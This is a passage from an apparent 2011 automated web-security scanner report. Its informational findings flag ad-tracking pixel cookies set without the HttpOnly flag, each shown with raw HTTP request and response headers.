Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c
Content-Length: 120

AID=myaccount_signin&website_id=528&reminder_service=&new=&email_isvalid=0&submitted=1&email=&password=&x=22&y=9&source=

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:28:24 GMT
Server: Apache
Set-Cookie: auto_signed_out=0; expires=Sun, 15 May 2011 10:28:25 GMT; path=/; domain=.ftd.com
Set-Cookie: create_account_from_toolbar=0; expires=Sun, 15 May 2011 10:28:25 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:28:25 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 114156


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

13.111. http://phoenix.untd.com/TRCK/RGST

Summary

Severity:   Information
Confidence:   Certain
Host:   http://phoenix.untd.com
Path:   /TRCK/RGST

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TRCK/RGST?AGMT=249&TIME=720&RNS=ea07e739-24b7-4742-aa1e-439f2099de73 HTTP/1.1
Host: phoenix.untd.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:49 GMT
nnCoection: close
Server: Phoenix/1.5.1
Content-Type: image/gif
Content-Length: 43
Set-Cookie: WHRE=1855A_1:125DC3_0_1882A; expires=Thu, 13 May 2021 02:01:49 GMT; domain=.untd.com; path=/
P3P: policyref="http://cyclops.prod.untd.com/common/w3c/netzero.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa OUR BUS IND PHY ONL UNI FIN COM NAV INT DEM PRE LOC"
Pragma: no-cache
Expires: Tue, 25 Apr 1995 09:30:27 -0700

GIF89a.............!.......,...........D..;

13.112. http://pix04.revsci.net/D05509/b3/0/3/noscript.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D05509/b3/0/3/noscript.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D05509/b3/0/3/noscript.gif?D=DM_EVT%3Dbmuk_criteo HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=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; rsi_segs_1000000=pUPNcDPB7QMUFVJmHElW1WAhFpB0I5EmV+QHrdRrcAMkOX+o7LQjAQv0aGumjYcA+pD55MfuOfQbGooH3qorp++zHuX/61m4ao1z4yL4Lb3cyf2EkQb/3ZOSwdnh6MSu2Um4QVZJKClGNz2Fl9QeLKxco3pM/j3xxqXi/RBfDYQLHw069nJi4GhHujSDyULrAXw98qMzqzoEqWE=; rtc_6axN=MLsvrdMvcT5jJQFErn5VSDYGHlHr5G4IUDwGBCOQN50vl8AxTgkQ69k2sWbYhD5swupGFuttZZ30pjREZ/ZkKkhmVOC4XP9dHEpHAm3ADaku92HBduCPjDheEZyi3USKjMyJU8PKvSGf6dbgKbkkF1T9nPoTyICKBODL5dWNTWGJSo//SZoNqh0jXWrCVj5fE0hG1/Ew1855Q3kGOJISwLZwyFyrdDpPp9pEr5K7YRGtS1DhqDKb+B3xI4h5pUmK196H1VYARyez77DbY8fCN3YqmgkgAm74R4TtPLq8byYJ7dh3Jpzg7zgqcfYD+8HJFFf4m0VurVwRBH7s; rsiPus_-pah="MLsXsF8ubi5n4BCj6Iwxj+ChgP9MmEaXnPMMWCjo3/gXOBYBOsgcKGmq7J3s8bEELtEtuQAUMg2twd9L78Ckve4PRhn+TnbZZgzQjU6BafW/eRnGpuy0oiVFGmY3Anfh17v9nbyJlC6WkITH1s7atNzA94Byz2ahQWWSkgzSBeq/m5yGRHDBWVE3WQKWx1rq0Os5JD95fxkgtM/XMh8ZPItRGPdDs6DkKTj57w7NLvTrFYiNQkaAQXrvVknibEJ2Q3EEI6f88RHWUnsWlXdsumEcJ4AZQLWPtn8GUbAKtpnD2xZHycOIz+UUUTimvw1mPizedaDoQ3uueOR55nVFaPfwnliNg2DvaGTMKiNaZXNWSnvgXbxjGssTFwevLvWOYWkMVKVnyPJt2uFto8uxRa0p6J53cfm74Hg2akeLDOYR8NEH+Q6UGJLQxN+ehQIy1YbeY76PrG8="; 
rsi_us_1000000="pUMdJE+jMAYYlW2ENjvhvsgHgT7/5aCXkN7z8gcXCgZ1gJynnFMHqVsBOiV7rYspgf69oQGhvkYT2QspKokupFpwJRumBxvpw7cPDxvXAVU0zKSFPMS3ygCedbgjAS9oiHhUC5/j6jHxtns610mVu7thu0kvm0W1AigmkLPp4ijsHv8eAisFNrs3nvh2gMJgEKm9VRBMs7RFZkPTTn5fTNlQOhb7y5gRZlCjL3S13zOuGsx0cMAvlYgxQjr84eW9IMrhSFJX8K1sO2TOGZ63sgNBr6bl68IkMy9882nuR9lgRW33sLSL5K2g0Gbtiza9HRIyEy66iY367NNAO44QHQ6Df5BOeHejZzHIfUJAOfVVPuNv/nALwyQ1jT7eUXI/47I3dK+CIFcr1hgJDMZIta8NYHQj4TdmYVtkoEJ4gDpgYEX/QeF1KsmabHJEyD7mUMUToQpoF8s1dz1cglCSCTqaID/6pIxK2fjGISxWSaLQ30Yst1VAMgTrt8QOYUGu+y0BzQcRECjYx8BdY7kevKFhn/e4M6dJ0LCSm0klYP5YovfwCn9goB+6IQWThYuZ+1lrSHeoipKPGSeZQtjk7FORmWa6K4J8IgWDrZhEtqQQhs/+lr+Pi8n8JcgQogtlp1X3dC5uamSkgjcQjZlQCO1gfEOvztWPQ4kJXvfrC/jhbLNnyFcOfb6l+3bX+OHJSj9Wk1SsoQdwFfJxeHIjSyzo6AE8wEl4HBh7TPCVb3GQn4VapSpzVf0VdKUnq+GRsxpVTepHTifU0oKbhjRw2HJrcPbVKHEw5hwmxzvqxj9QRMjwdbqMlSiYvOoqLnf7wiFO6X8CJVULtJlZteAjCC3QQXMF8u0oj7tJsLaPEeWByepbTr8rWicdxWE2DuiNyQqSAZcc1hSX4WAqibO/kRE67l8L+1Lcvto9PvtEwrDoOwwLzMlTZ/s0MehUSospz1dV0EF/nLlo4OYsyGFiCY1j4GD01mbARJ4gFqVZzCAfmqWDH5inpgZbvg4PcB1YzlzWFTZLEH9cJf/TFL2SrSlXhtHf9udjwQ1VF0AwwPft/NiquMhNvw=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_6axN=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNfEOh7gMUVmN+rJTfuGJ3lJ2WIlmH+K4lNWvB9xCh8we5B/vOPodlGvFGW0Z4wA55MvPQcWymIH2JcYlrOwkYsTo9uVScK0Ua4baBot2CPh5UPtUBFRfDxV2qCUT9ijeVsXo0496NoZxE+VT03J2BBs/L705ahQTDFMb9AsF0RDzzS9OyuyEnNSh05TjP5dAXiU0xJ68BrtFi/ZBkUn4jVTkybTRgbgbR9JGbWMf5UNUl8uA=; Domain=.revsci.net; Expires=Tue, 15-May-2012 02:02:15 GMT; Path=/
Set-Cookie: rtc_okMd=MLsvsNFKMT5nJ5GuU8+Vm/S3bm5E5k5tMt3NnMGp0iPrRxZIAPXk1sWJJd0/criBZWlpdqwlBoSERTTrYCc/gUIlS1FVffKLHMTvhZ2/kRd2fDWGXo0973OxjVJvM4sWN23lbJTGpwkPvUZano6YF0AUV+JeNaoAt8+pSbKbdnsUNCEdADOFfSeqyYTDSDEIe2vG2nUWVvCrZ+mEz9AYFmDW2hNSjGBpITTC96K7z8YQwS3lvAdlwRZUXU+bm0B6nc2R3bprYgz8eD2Ov4Fe4x5XnK8Mne17nReJOAJZHIgz5IbuNCwt4XEkjz14AaSmzHNOpukOLKJpmILuaSsa9st9voigEMZmhjkK3mkyeJhApPsJEbab/3lzTO39mzt5Z54rippve02eRS7gFHqfCoB3HzprQxzA4Cf+P+TfZnKZ89g=; Domain=.revsci.net; Expires=Tue, 15-May-2012 02:02:15 GMT; Path=/
Set-Cookie: NETSEGS_D05509=82f4957c1a652091&D05509&0&4df56fa7&0&&4dcf5b30&1f1a384c105a2f365a2b2d6af5f27c36; Domain=.revsci.net; Expires=Mon, 13-Jun-2011 02:02:15 GMT; Path=/
X-Proc-ms: 263
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Mon, 16 May 2011 02:02:15 GMT

GIF89a.............!.......,...........D..;

13.113. http://pixel.fetchback.com/serve/fb/pdc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3166 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1305510838_11939:638_5512:45450; uid=1_1305510838_1305465388147:4406953890584386; kwd=1_1305510838; sit=1_1305510838_3166:638:638_3167:666:0_1888:45450:45450; cre=1_1305510838; bpd=1_1305510838; apd=1_1305510838; scg=1_1305510838; ppd=1_1305510838; afl=1_1305510838

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:07 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1305510847_11939:0_5512:45459; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: uid=1_1305510847_1305465388147:4406953890584386; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: kwd=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: sit=1_1305510847_3166:647:0_3167:675:9_1888:45459:45459; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: cre=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: bpd=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: apd=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: scg=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: ppd=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: afl=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 16 May 2011 01:54:07 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 290

<!-- campaign #11939 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(tim
...[SNIP]...

13.114. http://pixel.fetchback.com/serve/fb/ver

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/ver

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/ver?uatFilter=false&fb_key=pixel.fetchback.comcat%3D%26name%3Dlanding%26sid%3D3166http%3A%2F%2Fwww.gnc.com%2Fhome%2Findex.jsp%3Frdir%3D1a+%2Fserve%2Ffb%2Fpdc&cat=&sid=3166&name=landing&uid=1302186535420%3A5639073448711300&crv=0.0&oid=Unknown HTTP/1.1
Host: pixel.fetchback.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3166
Cookie: cmp=1_1305543176_11939:0; uid=1_1305543176_1302186535420:5639073448711300; kwd=1_1305543176; sit=1_1305543176_3166:0:0_3295:3356641:3354563; cre=1_1305543176; bpd=1_1305543176; apd=1_1305543176; scg=1_1305543176; ppd=1_1305543176; afl=1_1305543176

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:52:57 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1305543177_1302186535420:5639073448711300; Domain=.fetchback.com; Expires=Sat, 14-May-2016 10:52:57 GMT; Path=/
Set-Cookie: cre=1_1305543177; Domain=.fetchback.com; Expires=Sat, 14-May-2016 10:52:57 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 16 May 2011 10:52:57 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

13.115. http://pixel.mathtag.com/data/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /data/img

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /data/img?mt_id=100040&mt_dcid=1305510867 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530; ts=1305510843; mt_mop=9:1305510197|1:1305510843

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x3 pid 0x785d 30813
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 16 May 2011 01:54:30 GMT
Location: http://bid.openx.net/cm?pid=0b83a084-dd0b-4bfe-9e2e-ab3706fc9955&dst=http://sync.mathtag.com/sync/img%3Fmt_exid%3D5%26mt_exuid%3D4dd07bc8-e97b-118c-3dec-7b8c5c306530
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
Connection: Keep-Alive
Set-Cookie: ts=1305510870; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:54:30 GMT
Set-Cookie: mt_mop=1:1305510843|5:1305510870|9:1305510197; domain=.mathtag.com; path=/; expires=Wed, 15-Jun-2011 01:54:30 GMT
Content-Length: 0


13.116. http://pixel.mathtag.com/event/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event/img?mt_id=102938&mt_adid=100502&v1=&v2=&v3=&s1=&s2=&s3=&ord=627277572 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530; ts=1305510197; mt_mop=9:1305510197

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x1 pid 0x1c77 7287
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 16 May 2011 01:54:27 GMT
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
Connection: Keep-Alive
Set-Cookie: ts=1305510867; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:54:27 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

13.117. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5421&nid=2054&put=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; ruid=154dd07bb6adc1d6f31bfa10^1^1305508790^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; put_2081=AG-00000001389358554; ses2=5032^1; csi2=3179363.js^1^1305508799^1305508799&3158416.js^1^1305508790^1305508790; put_1185=4325897289836481830; cd=false; au=GNQQ9N2W-FJJG-10.204.178.130; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; rpb=5671%3D1%264212%3D1%263580%3D1%264222%3D1%266811%3D1%265421%3D1; rpx=5671%3D11993%2C0%2C1%2C%2C%264212%3D11993%2C0%2C1%2C%2C%263580%3D11993%2C0%2C1%2C%2C%264222%3D11993%2C0%2C1%2C%2C%266811%3D11993%2C0%2C1%2C%2C%265421%3D11993%2C0%2C1%2C%2C; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5671%3D1%264212%3D1%263580%3D1%264222%3D1%266811%3D1%265421%3D1; expires=Wed, 15-Jun-2011 02:01:48 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5671%3D11993%2C0%2C1%2C%2C%264212%3D11993%2C0%2C1%2C%2C%263580%3D11993%2C0%2C1%2C%2C%264222%3D11993%2C0%2C1%2C%2C%266811%3D11993%2C0%2C1%2C%2C%265421%3D11993%2C1%2C2%2C%2C; expires=Wed, 15-Jun-2011 02:01:48 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; expires=Wed, 15-Jun-2011 02:01:48 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.118. http://pixel.traveladvertising.com/Live/Pixel.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.traveladvertising.com
Path:   /Live/Pixel.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Live/Pixel.aspx?PlacementId=49600 HTTP/1.1
Host: pixel.traveladvertising.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712968%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2710&c=2&cb=40851379534
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: image/gif
Expires: Mon, 16 May 2011 02:02:56 GMT
Last-Modified: Mon, 16 May 2011 02:02:56 GMT
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: CookieId=2943716f476840758470c226fe759afb;Path=/;Domain=.traveladvertising.com;Expires=Sun, 08-Feb-2060 02:02:56 GMT
Set-Cookie: CookieDropperDropRetarget_CriteoRT=49600;Path=/;Domain=.traveladvertising.com;Expires=Wed, 15-Jun-2011 02:02:56 GMT
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........L..;

13.119. http://px.steelhousemedia.com/pr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://px.steelhousemedia.com
Path:   /pr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pr?get_px=1&prov_id=9056 HTTP/1.1
Host: px.steelhousemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?
Cookie: checkCookie=success

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: guid=1537f5df-e7b9-46ee-8bec-7f939810aa52;Domain=.steelhousemedia.com;Expires=Sat, 03-Jun-2079 13:55:47 GMT
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: tts="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";Version=1;Domain=.steelhousemedia.com;Expires=Sat, 03-Jun-2079 13:55:47 GMT;Max-Age=2147483647
Set-Cookie: checkCookie=success;Path=/;Domain=.steelhousemedia.com;Expires=Thu, 01-Jan-1970 00:00:00 GMT
Connection: close


13.120. http://px.steelhousemedia.com/st

Summary

Severity:   Information
Confidence:   Certain
Host:   http://px.steelhousemedia.com
Path:   /st

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: guid, tts. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /st?get_px=1&aid=9056&cb=1305542498385515&ce=1 HTTP/1.1
Host: px.steelhousemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?
Cookie: checkCookie=success

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: guid=c056e86d-7ee9-4885-969a-4f3148039040;Domain=.steelhousemedia.com;Expires=Sat, 03-Jun-2079 13:55:47 GMT
Expires: Thu, 01-Jan-1970 00:00:00 GMT
